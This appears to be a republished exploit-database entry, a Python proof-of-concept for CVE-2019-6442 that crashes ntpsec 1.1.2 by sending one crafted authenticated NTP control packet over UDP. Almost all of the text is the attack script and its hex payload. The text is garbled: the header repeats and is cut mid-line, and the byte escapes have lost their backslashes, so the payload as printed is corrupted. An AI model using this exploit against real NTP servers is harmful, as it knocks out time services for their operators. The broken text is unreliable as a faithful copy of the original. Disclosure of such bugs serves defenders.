#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author #!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-oobwrite
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: all versions of ntpsec including, and prior to 1.1.2.
# CVE: CVE-2019-6442
# Note: this PoC uses Keyid 1 with password agurkaa
import sys
import socket
buf = ("x16x08x00x03x00x00x00x00x00x00x01xd4x6cx65x61x6d" +
"x3dx41x41x41x41x41x41x41x41x41x41x42x42x42x42x42" +
"x42x42x42x42x42x41x41x41x41x41x41x41x34x41x41x42" +
"x42x42x42x42x42x42x42x42x42x41x41x41x41x41x41x41" +
"x41x41x41x42x42x42x42x42x42x42x42x42x42x41x41x41" +
"x42x41x41x41x41x41x41x41x41x41x41x42x42x42x42x42" +
"x42x42x42x42x42x31x32x33x34x35x3ex37x38x39x30x31" +
"x32x33x34x35x36x37x38x39x30x31x32x33x34x35x36x37" +
"x38x39x30x31x32x33x34x35x36x37x38x39x20x2dx36x33" +
"x34x35x36x37x38x39x30x31x32x38x3dx20x2dx36x4ax0a" +
"x0ax0ax0ax0ax64x0ax0ax0ax0ax2bx0ax0ax0ax34x35x36" +
"x37x38x39x0ax0ax0ax26x0ax0ax0ax0ax0ax0ax0ax0ax0a" +
"x0ax0ax0ax0ax0ax0ax0ax0ax0ax09x0ax0ax0ax0ax0ax0a" +
"x42x42x42x54x42x42x41x41x41x34x41x41x42x42x42x42" +
"x42x42x42x42x42x42x41x41x41x0ax2bx0ax0ax0ax0ax41" +
"x0ax2bx0ax0ax0ax0ax0ax0ax64x0ax0ax0ax0ax2bx0ax0a" +
"x41x41x41x41x57x41x42x42x42x42x42x42x42x42x25x42" +
"x42x41x41x41x0axaex4ax0ax0ax0ax0ax0ax64x0ax0ax08" +
"x0ax2bx0ax0ax0ax34x35x36x37x38x39x0ax0ax0ax26x0a" +
"x0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0ax0a" +
"x0ax09x0ax0ax0ax0ax0ax0ax42x42x42x54x42x42x41x41" +
"x41x34x41x41x42x42x42x42x42x42x42x42x42x42x41x41" +
"x41x0ax2bx0ax0ax0ax0ax41x0ax2bx0ax0ax0ax0ax0ax0a" +
"x64x0ax0ax0ax0ax2bx0ax0ax41x41x41x41x57x41x42x42" +
"x42x42x42x42x42x42x42x42x41x41x41x0ax0ax42x42x42" +
"x41x41x41x0ax2bx0ax0ax0ax0ax0ax0ax64x41x41x41x43" +
"x57x41x42x42x42x42x42x42x42x42x42x42x41x41x41x0a" +
"x0ax0ax05xffxffx05x0ax64x1bx0ax0ax0ax2bx0ax0ax0a" +
"x0ax0ax41x41x41x41x41x41x41x41x41x33x34x00x00x00" +
"x80x39x30x20x32x33x34x35x36x37x38x39x30x41x5bx41" +
"x00x00x00x01x8fx2cx6ex5bx49xe7xa0x78xa1x9bx50xf5" +
"xb2x18x04x00")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
NTPsec 1.1.2 config Out-Of-Bounds Write
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 241